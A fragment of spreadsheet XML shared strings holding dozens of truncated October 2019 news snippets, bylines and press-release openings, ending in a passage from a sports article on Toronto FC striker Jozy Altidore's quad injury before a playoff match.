    <t>J.B. Hunt Transport Services, Inc., (NASDAQ: JBHT) announced today that it expects to issue third quarter 2019 earnings after the market...</t>
  </si>
  <si>
    <t>File photo of Bishop McCort Catholic High School in Johnstown. (WJAC) {/p}</t>
  </si>
  <si>
    <t>0 comment Ukraine’s leader is not just trying to charm US President Donald Trump — he has now set his sights on Tom Cruise as well. The...</t>
  </si>
  <si>
    <t>PATRICK GEE, Mercury</t>
  </si>
  <si>
    <t>TEMCO smelter workers have a renewed sense of hope their jobs might yet be saved after parent company South32 today announced selling the...</t>
  </si>
  <si>
    <t>CHICAGO, Oct. 11, 2019 /PRNewswire/ -- Meyer Law is named as one of the Fastest Growing Law Firms in the United States by Law Firm 500,...</t>
  </si>
  <si>
    <t>SAN JOSE, Calif., Oct. 16, 2019 (GLOBE NEWSWIRE) -- George Barber, District Manager of California Water Service’s (Cal Water) Chico and...</t>
  </si>
  <si>
    <t>Scott Morrison is appalled by reports that Commonwealth war graves in Israel have been daubed with swastikas, saying such anti-Semitic...</t>
  </si>
  <si>
    <t>By Farhan Ali  6 mins ago 0 1 minute read</t>
  </si>
  <si>
    <t>After Ubisoft introduced Pick and Ban to ranked earlier this year, Rainbow Six Siege players used the mechanic to prove just how much...</t>
  </si>
  <si>
    <t>Constance Sommer</t>
  </si>
  <si>
    <t>Buying a used car isn't the junkyard sale of yore. Plentiful returns of two- and three-year-old leased cars and internet innovations like...</t>
  </si>
  <si>
    <t>Corrie Jansen</t>
  </si>
  <si>
    <t>Zacks Investment Research upgraded shares of Archrock (NYSE:AROC) from a sell rating to a hold rating in a report issued on Wednesday...</t>
  </si>
  <si>
    <t>PALO ALTO, Calif., Oct. 8, 2019 /PRNewswire/ -- Varian (NYSE: VAR) will showcase the company's interventional oncology solutions at the...</t>
  </si>
  <si>
    <t>MEADVILLE, Pa., Oct. 16, 2019 /PRNewswire-PRWeb/ -- "Worship Touching the Heart of God": a potent devotional that teaches readers the...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Campaign says Bernie Sanders had heart procedure for artery blockage, is canceling events until ‘further notice’...</t>
  </si>
  <si>
    <t>BERLIN (AP)  The European Union's top court has ruled that website operators must secure internet users' "active consent" to their storage...</t>
  </si>
  <si>
    <t>DENISE LAVOIE SARAH RANKIN Associated Press</t>
  </si>
  <si>
    <t>RICHMOND, Va. (AP) — By the time drug enforcement agents swooped into his small medical office in Martinsville, Virginia, in 2017, Dr. Joel...</t>
  </si>
  <si>
    <t>Fadi Didi</t>
  </si>
  <si>
    <t>"Chew On This" event will focus on reducing poverty in Huron County.</t>
  </si>
  <si>
    <t>The CW is bringing a classic favorite into the year 2019 this fall when the brand new series Nancy Drew premieres this Wednesday night at...</t>
  </si>
  <si>
    <t>The "Chile Automated Microbiology Market for over 100 Tests" report has been added to ResearchAndMarkets.com's offering. This new report...</t>
  </si>
  <si>
    <t>Labour’s general election manifesto will be written “from the grassroots up”, John McDonnell said as he kicked off a UK-wide pre-poll...</t>
  </si>
  <si>
    <t>SOURCE: ScottsMiracle-Gro This blog is one in a series focused on the impact of coastal restoration in mitigating the effects of pollutant...</t>
  </si>
  <si>
    <t>DALLAS, Oct. 4, 2019 /PRNewswire/ -- RKD Group, a leading provider of multichannel marketing and fundraising solutions for nonprofit...</t>
  </si>
  <si>
    <t>Originally posted on MLB Trade Rumors</t>
  </si>
  <si>
    <t>Long-time big leaguer Raul Ibanez has popped up from time to time as a managerial candidate. But he has thus far declined requests to...</t>
  </si>
  <si>
    <t>Adam Bienkov</t>
  </si>
  <si>
    <t>Just one-in-five British people would choose to leave the EU with Boris Johnson's deal as their preferred Brexit outcome. Cancelling...</t>
  </si>
  <si>
    <t>Vancouver police have apologized to a Richmond senior who was slapped with a $368 distracted driving nice for having her cellphone in her...</t>
  </si>
  <si>
    <t>10/17/2019 2:50 Brandon Tanev scored a short-handed goal with 1:03 left in overtime Wednesday to give the host Pittsburgh Penguins a 3-2...</t>
  </si>
  <si>
    <t>TORONTO, Oct. 15, 2019 (GLOBE NEWSWIRE) -- Ideon Media is pleased to announce it will serve as the exclusive Canadian ad sales partner...</t>
  </si>
  <si>
    <t>If you've wanted to keep a journal or get better at organizing your thoughts you need to get the 52 Lists Project! It's a book created by a...</t>
  </si>
  <si>
    <t>A Prime Mover in Grey's Social Media Creativity NEW YORK, Oct. 10, 2019 /PRNewswire/ -- Dan Bennett, Worldwide Chief Innovation Officer,...</t>
  </si>
  <si>
    <t>Today, sort out your stress, pain, low energy, headaches, anxiety, depression, poor skin and beauty, low fertility, bad digestion and/or a...</t>
  </si>
  <si>
    <t>Washington Post</t>
  </si>
  <si>
    <t>The clip brought a wave of gripes from disillusioned customers of a chain known for dining typically perceived as a step above fast food in...</t>
  </si>
  <si>
    <t>Tehran, Oct 19, IRNA - Governor of the Central bank of Iran (CBI) Abdolnasser Hemmati said less than 1/3 exports is related to oil.</t>
  </si>
  <si>
    <t>CisionPRNewswire             (Cision PR Newswire)</t>
  </si>
  <si>
    <t>DALLAS, Oct. 2, 2019 /PRNewswire/ -- Topgolf Studios, a brand expression of Topgolf Entertainment Group, and Jada Pinkett Smith and Will...</t>
  </si>
  <si>
    <t>Emily Zemler, provided by</t>
  </si>
  <si>
    <t>The black and white video was co-directed by the singer herself</t>
  </si>
  <si>
    <t>Glancy Prongay &amp; Murray LLP (“GPM”) reminds investors of the upcoming November 26, 2019 deadline to file a lead plaintiff motion in the...</t>
  </si>
  <si>
    <t>HIGHLANDS, N.J. (AP) — A TV news crew covering a storm at the New Jersey shore captured a couple's engagement on camera. WNBC-TV in New...</t>
  </si>
  <si>
    <t>The MIT Center for Transportation &amp; Logistics and AWESOME (Achieving Women’s Excellence in Supply Chain Operations, Management and...</t>
  </si>
  <si>
    <t>Wall Street fell on Friday as negative headlines about Johnson &amp; Johnson and Boeing, along with bleak economic data from China, soured...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 7, 2019 /PRNewswire/ -- Market Overview The environmental health and safety software market is expected to register a CAGR...</t>
  </si>
  <si>
    <t>WINNIPEG -- The City of Winnipeg is looking for help paying for the cleanup costs of the snow storm. Mayor Brian Bowman’s executive policy...</t>
  </si>
  <si>
    <t>By Chris Van Buskirk and Michael P. NortonState House News Service</t>
  </si>
  <si>
    <t>BOSTON, OCT. 16, 2019.....The state health department on Wednesday reported 10 new cases of vaping-associated pulmonary injury and the...</t>
  </si>
  <si>
    <t>Don Miller</t>
  </si>
  <si>
    <t>Patten &amp; Patten Inc. TN lowered its stake in shares of Bank of America Corp (NYSE:BAC) by 6.4% during the third quarter, according to its...</t>
  </si>
  <si>
    <t>huaxia</t>
  </si>
  <si>
    <t>BEIJING, Oct. 10 (Xinhua) -- Air quality forecast for major Chinese tourist cities on Oct. 11 selected from the daily report of China...</t>
  </si>
  <si>
    <t>PITTSBURGH (AP) — Lawyers for the man accused of shooting to death 11 worshippers in a Pittsburgh synagogue last year say the case would be...</t>
  </si>
  <si>
    <t>Ontario's greenhouse sector is growing fast, and a new report by the Independent Electricity System Operator (IESO) shows there is great...</t>
  </si>
  <si>
    <t>Congress returns today to an impeachment inquiry moving into high gear and a rapidly unfolding foreign policy disaster in Syria that’s...</t>
  </si>
  <si>
    <t>The lead-up to Nebraska’s prime-time matchup with Ohio State last weekend featured more hullabaloo than any game this season and probably...</t>
  </si>
  <si>
    <t>10/09/2019 14:03 WASHINGTON, (Reuters) - U.S. wholesale inventories increased less than initially estimated in August, suggesting...</t>
  </si>
  <si>
    <t>Tower Research Capital LLC TRC boosted its holdings in Qiagen NV (NYSE:QGEN) by 1,244.7% in the second quarter, according to its most...</t>
  </si>
  <si>
    <t>Dynamo Internacional Gestao DE Recursos LTDA. increased its stake in Electronic Arts Inc. (NASDAQ:EA) by 42.9% during the 2nd quarter,...</t>
  </si>
  <si>
    <t>A team of investigators from four universities, led by Bart Johnson, a University of Oregon landscape architecture professor, will be...</t>
  </si>
  <si>
    <t>JANESVILLE, Wis., (WMTV/Gray News) - A would-be shoplifter used a rather strange tactic in an attempt make off with some merchandise, said...</t>
  </si>
  <si>
    <t>VANCOUVER, Oct. 15, 2019 /CNW/ - Trading resumes in: Company: AMP German Cannabis Group Inc. CSE Symbol: XCX (All Issues) Resumption (ET):...</t>
  </si>
  <si>
    <t>NUI TE KOHA, Herald Sun</t>
  </si>
  <si>
    <t>UFC middleweight champion Robert Whittaker refuses to trash-talk his opponents because he wants to set a good example to his young children.</t>
  </si>
  <si>
    <t>MINNEAPOLIS and BURBANK, Calif., Oct. 4, 2019 /PRNewswire/ -- The Walt Disney Company (NYSE: DIS) and Target Corporation (NYSE: TGT) today...</t>
  </si>
  <si>
    <t>Starting at 9am on October 15, 2019, department crews are closing one (1) eastbound inside lane and one (1) westbound inside lane of W Bay...</t>
  </si>
  <si>
    <t>By BILL HUTCHINSON</t>
  </si>
  <si>
    <t>The police officer who fatally shot a Fort Worth, Texas, woman in her home while answering a call for a welfare check has been arrested on...</t>
  </si>
  <si>
    <t>BEIRUT (AP) — The Latest on Turkey's invasion of northeastern Syria in a military operation against Syrian Kurdish fighters there (all...</t>
  </si>
  <si>
    <t>The German trade surplus is stifling the economic growth in the rest of Europe, Michael Ivanovitch writes.</t>
  </si>
  <si>
    <t>David Bauder The Associated Press</t>
  </si>
  <si>
    <t>Fox takes second week of television season</t>
  </si>
  <si>
    <t>AWS</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=zU-EX5hXPzg Click to learn more about the AWS Public Dataset Program: https://aws.amazon.com/opendata/ In...</t>
  </si>
  <si>
    <t>Brenna Hughes Neghaiwi</t>
  </si>
  <si>
    <t>ZURICH, Oct 1 (Reuters) - A private investigator who organised the surveillance of a senior former Credit Suisse manager committed suicide...</t>
  </si>
  <si>
    <t>By Naomi Herring</t>
  </si>
  <si>
    <t>Reporter covering Bicester. Call me on 01865 425427 Dogs for Good trainee assistance dogs head to Cotswold Wildlife Park to test their...</t>
  </si>
  <si>
    <t>Oct, Thu 10 2019 - 10:00 AM to 11:15 AM</t>
  </si>
  <si>
    <t>Remember when the default state of your online presence was anonymity? That's not so clear-cut anymore, and the worst part is you may not...</t>
  </si>
  <si>
    <t>ANKARA: President Recep Tayyip Erdogan announced the start of the attack on Twitter, labelling it “Operation Peace Spring”. “Our mission...</t>
  </si>
  <si>
    <t>Originally posted on https://www.accidenthelpzone.com/5-reasons-you-dont-want-to-wait-to-file-a-workers-compensation-claim/ Did you have...</t>
  </si>
  <si>
    <t>Alexandra Rucki;Nisha Mal</t>
  </si>
  <si>
    <t>He thanked officers for 'saving our lives' and 'keeping us safe'</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 07, 2019 (GLOBE NEWSWIRE) -- Rosen Law Firm, a global investor rights law firm, announces it has filed a class action...</t>
  </si>
  <si>
    <t>The "Passenger Boarding Bridge - Global Market Outlook (2018-2027)" report has been added to ResearchAndMarkets.com's offering. Global...</t>
  </si>
  <si>
    <t>ORLANDO, Fla. (AP) — FBI officials say they will not file criminal charges against a woman who boarded a flight at a Florida airport...</t>
  </si>
  <si>
    <t>LONDON and SAN FRANCISCO, Oct. 16, 2019 /PRNewswire/ -- Digital Shadows, the leader in external threat intelligence, today reveals new...</t>
  </si>
  <si>
    <t>RALEIGH, NC / ACCESSWIRE / October 16, 2019 / Right Hook, a North Carolina-based startup has hopes to offer conservatives and moderates of...</t>
  </si>
  <si>
    <t>A 12-year-old boy in North Carolina was dragged and hit by his school bus after his backpack got caught in its doors and dropped him in the...</t>
  </si>
  <si>
    <t>Though it’s off its highs of the year, the Global X Robotics &amp; Artificial Intelligence Thematic ETF ( BOTZ ) has recently been mostly...</t>
  </si>
  <si>
    <t>CEDAR ATTANASIO Associated Press</t>
  </si>
  <si>
    <t>EL PASO, Texas (AP) — The 19-year-old suspect in the fatal shooting of 22 people at a Texas Walmart is set to face his trial judge Thursday...</t>
  </si>
  <si>
    <t>GLENVIEW, Ill., Oct. 03, 2019 (GLOBE NEWSWIRE) -- Illinois Tool Works Inc. (NYSE: ITW) will issue its third quarter 2019 results on...</t>
  </si>
  <si>
    <t>October 8, 2019 By Aimee Kalnoskas Leave a Comment UltraSoC announced next-generation hardware-based cybersecurity products that can be...</t>
  </si>
  <si>
    <t>SEATTLE (4-1) at CLEVELAND (2-3) Sunday, 1 p.m., Fox OPENING LINE — Seahawks by 2 RECORD VS. SPREAD — Seahawks 2-3, Browns 2-3 SERIES...</t>
  </si>
  <si>
    <t>JPMorgan Chase &amp; Co. lifted its holdings in shares of CBIZ, Inc. (NYSE:CBZ) by 2.2% all through the second sector, in accordance with its...</t>
  </si>
  <si>
    <t>Attractive stocks have exceptional fundamentals. In the case of Rawlplug S.A. (WSE:RWL), there’s is a company that has been able to sustain...</t>
  </si>
  <si>
    <t>from Oct, Sat 5 2019 - 9:00 AM</t>
  </si>
  <si>
    <t>The global Hibiscus Flower Powder Market size is anticipated to reach USD 160.2 million by 2025, according to a new report by Grand View...</t>
  </si>
  <si>
    <t>ENGLAND have played in Prague four times, but tonight’s game will be the first there since the Czech Republic and Slovakia split into...</t>
  </si>
  <si>
    <t>Portions of 34 Counties Will be Impacted by Widespread, Severe Wind Event Beginning Wednesday New Counties Added Since Monday: Marin,...</t>
  </si>
  <si>
    <t>By: The Associated Press</t>
  </si>
  <si>
    <t>CAROLINA (3-2) vs. TAMPA BAY (2-3) in London Sunday, 9:30 a.m. ET, NFL Network OPENING LINE - Panthers by 3 RECORD VS. SPREAD - Carolina...</t>
  </si>
  <si>
    <t>TORONTO, Oct. 08, 2019 (GLOBE NEWSWIRE) -- iSIGN Media Solutions Inc. (“iSIGN” or “Company”) (TSX-V: ISD) (OTC: ISDSF), a leading...</t>
  </si>
  <si>
    <t>David Pinto</t>
  </si>
  <si>
    <t>Howie Kendrick hits his third double in the bottom of the seventh inning. That ties the record for most doubles in an LCS game. The...</t>
  </si>
  <si>
    <t>Brandpoint (BPT)</t>
  </si>
  <si>
    <t>Sorry, but your browser does not support the video tag. (BPT) - Renee Yahara valued her active lifestyle and the activities that brought...</t>
  </si>
  <si>
    <t>NBC News</t>
  </si>
  <si>
    <t>LOUISIANA, MO (WGEM) – A portion of a Missouri bridge that stood for nearly 90 years is no more. Part of the old Champ Clark Bridge was...</t>
  </si>
  <si>
    <t>The "Cardiac Pacemakers - Market Analysis, Trends, and Forecasts" report has been added to ResearchAndMarkets.com's offering. Cardiac...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / October 17, 2019 / Levi &amp; Korsinsky, LLP announces that class action lawsuits have commenced on behalf of...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- Strata Data Conference is one of the biggest data conferences in the world, and this year's edition proved it yet again....</t>
  </si>
  <si>
    <t>Nathan Katnoria</t>
  </si>
  <si>
    <t>CHECK OUT the celeb couples who hit the skids in 2019</t>
  </si>
  <si>
    <t>Use of seized, donated plots for public rental apartments to help address housing shortage The plan by the Hong Kong Special Administrative...</t>
  </si>
  <si>
    <t>Kanishka Singh</t>
  </si>
  <si>
    <t>A New York court has temporarily halted a state ban on the sale of flavoured e-cigarettes, giving the embattled vaping industry a breather...</t>
  </si>
  <si>
    <t>Author;Billboard</t>
  </si>
  <si>
    <t>Is there anything better than a warehouse rave? Big stage lights are cool and everything, but give us four dirty walls and a bangin' sound...</t>
  </si>
  <si>
    <t>By JENS MEYER and GEIR MOULSON Associated Press</t>
  </si>
  <si>
    <t>BERLIN (AP) — Several shots were fired Wednesday in the eastern German city of Halle, leaving two people dead as the suspected assailants...</t>
  </si>
  <si>
    <t>David Matthews</t>
  </si>
  <si>
    <t>An iceberg weighing 315 billion tons has broken off of Antartica, according to satellite images. In the course of five days in September,...</t>
  </si>
  <si>
    <t>Authorities in Alabama say they've expanded the search for a missing 3-year-old girl to include surrounding states</t>
  </si>
  <si>
    <t>MOHAMMED DARAGHMEH Associated Press</t>
  </si>
  <si>
    <t>RAMALLAH, West Bank (AP) — Palestinian officials say the Palestinian Authority has agreed to accept hundreds of millions of dollars in tax...</t>
  </si>
  <si>
    <t>from Oct, Sun 20 2019 - 12:00 AM</t>
  </si>
  <si>
    <t>The "Iceland Molecular Diagnostic Analyzers and Reagent Forecasts for 100 Tests: Supplier Shares and Strategies, Volume and Sales Segment...</t>
  </si>
  <si>
    <t>A diversity report shows the WNBA remains the leader among all professional sports leagues in hiring women and minorities for coaching and...</t>
  </si>
  <si>
    <t>IRVINE, Calif., Oct. 9, 2019 /PRNewswire/ -- Sena Technologies, Inc. the global leader in Bluetooth® communication solutions for...</t>
  </si>
  <si>
    <t>Halt smart motorways roll-out, demands road safety group</t>
  </si>
  <si>
    <t>U.S. House of Representatives' Speaker Nancy Pelosi said on Wednesday she hoped Congress would still be able to work with the White House...</t>
  </si>
  <si>
    <t>By Madeline Holcombe and Ben Tinker</t>
  </si>
  <si>
    <t>Lung damage in those using e-cigarettes might be caused by chemicals in the vape liquid, according to a letter published Wednesday in the...</t>
  </si>
  <si>
    <t>「經濟學人」(The Economist)的Open Future網站舉辦了一場青年作文比賽，限16-25歲的人參加，題目是「需用哪些經濟與政治的改變來有效的因應氣候的改變？」文限1000...</t>
  </si>
  <si>
    <t>Antony Sguazzin</t>
  </si>
  <si>
    <t>(Bloomberg) -- Liquid Telecom, Africa’s biggest fiber company, has turned to solar power in South Africa, a country where recurrent power...</t>
  </si>
  <si>
    <t>charles the moderator</t>
  </si>
  <si>
    <t>/**/ /**/</t>
  </si>
  <si>
    <t>A limited-edition Fleetwood Mac box set featuring colored-vinyl versions of the five albums issued by the band's best-known lineup will be...</t>
  </si>
  <si>
    <t>Many aesthetic doctors now recommend Latisse as a speedy, safe solution for eyelash growth Vancouver, BC -- (ReleaseWire) -- 10/04/2019 --...</t>
  </si>
  <si>
    <t>This Penn State TD become overturned and Freiermuth turned into ruled down on the [email protected] took competencies and held them to...</t>
  </si>
  <si>
    <t>Global “Borate Mineral Market” 2019 Industry Research Report is a professional and in-depth study on the current state of the Global Borate...</t>
  </si>
  <si>
    <t>The third annual football encounter between Royal College, Colombo and Trinity College, Kandy will be held today from 3:30 p.m. onwards at...</t>
  </si>
  <si>
    <t>Ferrari’s Charles Leclerc was dealt a double time penalty following his first-lap crash with Max Verstappen at Sunday’s Japanese Grand...</t>
  </si>
  <si>
    <t>thesundaily</t>
  </si>
  <si>
    <t>CARDIFF: Gareth Bale claimed a point for Wales as they drew 1-1 with World Cup runners-up Croatia on Sunday which left their Euro 2020...</t>
  </si>
  <si>
    <t>ALX Oncology, a clinical-stage immuno-oncology company developing therapies to block the CD47 checkpoint mechanism, today announced that it...</t>
  </si>
  <si>
    <t>Marc Larocque Enterprise Staff Writer   @Enterprise_Marc</t>
  </si>
  <si>
    <t>Rob May, the director of planning and economic development for the city of Brockton, first hired in 2014, is up for another five-year term....</t>
  </si>
  <si>
    <t>BEIRUT (AP) — The Latest on developments in Syria (all times local): 9:00 p.m. U.N. Secretary-General Antonio Guterres is urging "maximum...</t>
  </si>
  <si>
    <t>By Shereen Hashem, KTEN News</t>
  </si>
  <si>
    <t>Pictures from the scene show flames shooting from a building in the 300 block of Main Street.</t>
  </si>
  <si>
    <t>By Julie Storer</t>
  </si>
  <si>
    <t>The Lady Eagle 7th Grade C team tipped off another sweep in Hyatt Gym with with a two-set (25-16, 25-16) victory against Manor New Tech....</t>
  </si>
  <si>
    <t>It's Prelim Wednesday! Take a look at one of the highlighted prelim fights from Bellator 228 - Antionio Mckee vs. William Sriyapai in it's...</t>
  </si>
  <si>
    <t>The Ion Exchange Resins Market was valued at USD 1.20 Billion in 2016 and is projected to reach USD 1.56 Billion by 2022, at a CAGR of 4.4%...</t>
  </si>
  <si>
    <t>Bob Nightengale</t>
  </si>
  <si>
    <t>HOUSTON — The Houston Astros got a little scare, even a little rattled, but Thursday night, normalcy returned to Minute Maid Park in front...</t>
  </si>
  <si>
    <t>For more than six years, designer Zach Gage has been toying with an idea for a game where players explore dangerous dungeons, but did so...</t>
  </si>
  <si>
    <t>Alaa Elassar, CNN</t>
  </si>
  <si>
    <t>CNN — Kansas Jayhawks athletic director Jeff Long issued an apology Friday night following Snoop Dogg's raucous performance at an annual...</t>
  </si>
  <si>
    <t>Experts have called for systematic use of an “exercise prescription” to help cancer patients cope with treatment side-effects.</t>
  </si>
  <si>
    <t>Similarly, Central Bank of India and Indian Overseas Bank had 4 defaulters each, owing more than Rs 500 crore when their loans were written...</t>
  </si>
  <si>
    <t>Safe standing will not be trialled in England's top two leagues this season, despite a new report suggesting controlled tests would have...</t>
  </si>
  <si>
    <t>Helen Regan and Manveena Suri, CNN</t>
  </si>
  <si>
    <t>Half of country couldn't access a toilet</t>
  </si>
  <si>
    <t>GamingLyfe.com</t>
  </si>
  <si>
    <t>The Pokémon Company International and Nintendo today revealed the Gigantamax forms of Pikachu, Charizard, Eevee, Meowth, and Butterfree....</t>
  </si>
  <si>
    <t>Kim Johansen</t>
  </si>
  <si>
    <t>G&amp;S Capital LLC lessened its stake in shares of SPDR S&amp;P 500 ETF Trust (NYSEARCA:SPY) by 0.6% during the 3rd quarter, according to its most...</t>
  </si>
  <si>
    <t>TSX: ACB | NYSE: ACB EDMONTON, Oct. 3, 2019 /PRNewswire/ - Aurora Cannabis Inc. (the "Company" or "Aurora") (NYSE | TSX: ACB), the Canadian...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 7, 2019 /PRNewswire/ -- Housing Works, a NYC non-profit organization that provides advocacy, support and lifesaving services...</t>
  </si>
  <si>
    <t>Dublin, Oct. 04, 2019 (GLOBE NEWSWIRE) -- The "Text Analytics - Market Analysis, Trends, and Forecasts" report has been added to...</t>
  </si>
  <si>
    <t>MIAMI (AP) — The Latest on Tropical Storm Nestor (all times local): 7 p.m. Heavy rains are spreading over parts of the U.S. Gulf Coast as...</t>
  </si>
  <si>
    <t>Amie Schaenzer, Patch Staff</t>
  </si>
  <si>
    <t>Ivy Hill Elementary School is among only 311 schools across the nation to be selected for the Blue Ribbon program this year.</t>
  </si>
  <si>
    <t>Rockets player apologizes about manager's tweet supporting Hong Kong BEIJING (AP) — Houston Rockets general manager Daryl Morey tried...</t>
  </si>
  <si>
    <t>Sheffield weather forecast: Sunny spells but this is when cloud could spoil plans later | The Star</t>
  </si>
  <si>
    <t>JEFFERSON CITY, Mo. (AP) — A federal judge has declined to block a Missouri law that bans companies from labeling plant-based meat products...</t>
  </si>
  <si>
    <t>October 18, 2019 - /PressAdvantage/ - Vic’s Towing announces the formal opening of their improved recovery and towing service in Aurora,...</t>
  </si>
  <si>
    <t>PrideStaff, a national, franchised staffing organization, is pleased to announce that they were named to Entrepreneur's Top Franchises for...</t>
  </si>
  <si>
    <t>DENVER, Oct. 7, 2019 /PRNewswire/ -- Vista Gold Corp. ("Vista" or the "Company") (NYSE American and TSX: VGZ) today announced that it has...</t>
  </si>
  <si>
    <t>CARMEL, Indiana, October 03, 2019 /PRNewswire-PRWeb/ -- Beth is hosting the donation drive for Soles4Souls during the entire month of...</t>
  </si>
  <si>
    <t>Indonesia’s Papua province has turn out to be the focal point of a well-funded social media marketing campaign the usage of bots to...</t>
  </si>
  <si>
    <t>Originally posted on https://www.designblendz.com/blog/benefits-of-virtual-reality-real-estate Virtual reality has taken over the world in...</t>
  </si>
  <si>
    <t>ALBUQUERQUE, N.M. (AP) — Hundreds of balloons have filled the sky over Albuquerque in the city's annual International Balloon Fiesta....</t>
  </si>
  <si>
    <t>Bernie Sanders began reintroducing himself to the 2020 campaign on Tuesday, venturing outside his Vermont home to say that he does not plan...</t>
  </si>
  <si>
    <t>Samantha Bergeson</t>
  </si>
  <si>
    <t>Bright lights, big city! A select few of reality TV's biggest stars (think charismatic NeNe Leakes of Real Housewives of Atlanta fame)...</t>
  </si>
  <si>
    <t>More than 35,000 NHS admissions in the last five years have been for children with severe burns, figures show. New data analysed by the...</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.2 in Q2 2019. Its down 0.37, from 1.57 in 2019Q1. It is negative, as 13 investors sold Cogent...</t>
  </si>
  <si>
    <t>Victoria Hernandez</t>
  </si>
  <si>
    <t>How had two Southern Hip Hop power players not yet collaborated? Only God knows. But this fall, Zaytoven and Boosie Bad Azz fixed that...</t>
  </si>
  <si>
    <t>LETHBRIDGE, Alta. — The Crown is appealing the not guilty verdict in the case of an Alberta couple charged with not seeking medical help...</t>
  </si>
  <si>
    <t>Admirable chap he may be, but Geordie Greig, in his Lunch with the FT (October 5), is as economic with the actualité as your paper is in...</t>
  </si>
  <si>
    <t>ABIDJAN - 01 October, 2019 - Adiel Akplogan yesterday joined the ranks of notable individuals who have been inducted into the Internet Hall...</t>
  </si>
  <si>
    <t>U.S. Treasury yields fall Wednesday after comments from European leaders raises uncertainty that a deal for the U.K. to leave the European...</t>
  </si>
  <si>
    <t>The global laptop carry case market is expected to post a CAGR of around 4% during the period 2019-2023, according to the latest market...</t>
  </si>
  <si>
    <t>Thirsk-based All Steels Trading ( www.allsteelstrading.co.uk ) has completed the acquisition of Bromford Iron &amp; Steel (...</t>
  </si>
  <si>
    <t>Hadas Kuznits</t>
  </si>
  <si>
    <t>The annual tradition of bringing the farm to the city during this time of the year continued Saturday outside of Reading Terminal Market,...</t>
  </si>
  <si>
    <t>A federal judge has ruled a Utah county violated the constitutional rights of two Ogden men charged under a gang injunction. The Ogden...</t>
  </si>
  <si>
    <t>Alia Paavola</t>
  </si>
  <si>
    <t>President Donald Trump will unveil an executive order regarding the Medicare system in a speech this week, two people familiar with the...</t>
  </si>
  <si>
    <t>Visakhapatnam, Oct 3 (IANS) Rohit Sharma and Mayank Agarwal on Thursday became the third Indian opening pair to stitch together a 300-run...</t>
  </si>
  <si>
    <t>San Francisco, Oct 3 (IANS) Apple is reportedly planning to unveil its next version AirPods with noise-cancellation capabilities and now an...</t>
  </si>
  <si>
    <t>West Tamar Council, Tasmania, is supporting local young people to achieve their best and become leaders in the community. The municipality,...</t>
  </si>
  <si>
    <t>LONDON (AP) — Britain’s government on Thursday restricted the export of 24 drugs as part of efforts to reduce shortages of some medicines,...</t>
  </si>
  <si>
    <t>Oct, Fri 11 2019 - 6:00 PM to 3:00 PM</t>
  </si>
  <si>
    <t>Ariana DiValentino</t>
  </si>
  <si>
    <t>Luxury brand Kate Spade New York has a new home-goods store on Amazon. The shop features things like candy-colored kitchen appliances,...</t>
  </si>
  <si>
    <t>Mackenzie Financial Corp reduced its stake in Regeneron Pharmaceuticals Inc (NASDAQ:REGN) by 85.9% during the second quarter, according to...</t>
  </si>
  <si>
    <t>Sports radio star and handicapper Andy Slater hits a big parlay and clients are ecstatic.</t>
  </si>
  <si>
    <t>I have in the past been critical of the financial impact of the Champions League on European club football, and its role in reinforcing...</t>
  </si>
  <si>
    <t>Zacks Investment Research upgraded shares of Avaya (NYSE:AVYA) from a hold rating to a buy rating in a research note issued to investors on...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 9, 2019 /PRNewswire/ -- Commercial Vehicles market worldwide is projected to grow by 9.1 Million Units, driven by a...</t>
  </si>
  <si>
    <t>Gemma Cottrell</t>
  </si>
  <si>
    <t>Maverick Capital Ltd. purchased a new position in Ameriprise Financial, Inc. (NYSE:AMP) during the 2nd quarter, according to its most...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — The Latest on House Democrats' impeachment inquiry into President Donald Trump (all times local): 8:15 p.m. Former...</t>
  </si>
  <si>
    <t>Nine Energy Service, Inc. (NYSE:NINE) announced today that it has scheduled its third quarter 2019 earnings conference call for Monday,...</t>
  </si>
  <si>
    <t>Khloé Kardashian is reportedly "toying" with the idea of getting back together with Tristan Thompson. The 'Keeping Up With the...</t>
  </si>
  <si>
    <t>This detailed presentation on ‘ Robotic Laser Cutting market’ available at MarketStudyReport.com, features an exhaustive study conveying...</t>
  </si>
  <si>
    <t>VANCOUVER, British Columbia, Oct. 10, 2019 (GLOBE NEWSWIRE) -- Ero Copper Corp. (the “Company”) (TSX: ERO) is pleased to announce the...</t>
  </si>
  <si>
    <t>Australia’s ambassador to the United States on Thursday delivered a humiliating smackdown to Sen. Lindsey Graham (R-SC) for his latest...</t>
  </si>
  <si>
    <t>Technological disruption will be the biggest risk facing investors in the coming years, says Will Rhind, founder and CEO of ETF issuer...</t>
  </si>
  <si>
    <t>Steve Buffery</t>
  </si>
  <si>
    <t>Toronto FC coach Greg Vanney said on Friday that star forward Jozy Altidore is “questionable” for Saturday’s playoff match at BMO Field against D.C. United. But if the decision was Altidore’s, it’s a no-brainer. “I start the game, if it was up to me. No problem,” said Altidore. “(But) we’ll see. I feel better.” The 29-year-old striker suffered a quad strain in the final regular-season game of the year on Oct.6 against the Columbus Crew. The American international was forced out of the U.S.- Canada showdown last Tuesday at BMO Field. Altidore has been unable to train with the Reds the past couple of weeks as they prepared for the opening-round playoff match against Wayne Rooney and the Black and Red under the lights on Saturday, but he was on the field doing limited work on Friday. The key for Vanney is finding a balance in which Altidore could help the team without aggravating the injury and risk sidelining him for a potential Eastern Conference semifinal next Wednesday against NYCFC. Vanney also understands Altidore is going to push hard to be in the game no matter how he feels. “These decisions are always tough because the games are so important,” said Vanney. “But there are some key fundamental principles by which we would put a guy on the field or not put a guy on the field. So we’ll stick with those as much as we can. “All of these decisions are a collaborative process between the doctors, between the player, our training staff, myself … everybody is involved,” added the coach. “This is not an isolated choice for anyone in this.” Altidore was all smiles following training on Friday. There was a clear sense he will play if it is at all possible. “Look, I’ve been here a long time now, the coaches know me, they know I will play with whatever (pain or discomfort),” Altidore said. “As a player, when you come across certain clubs, certain moments in your career, you want to give back everything. The club’s given me everything and, regardless of injuries, if I can, if I’m able to be out there, I want to help and give everything I can. “I have to let myself heal but, at the same time, I’m at the point, obviously, where I’m training, and if the team needs, if the coach (asks), I’m ready.” Vanney 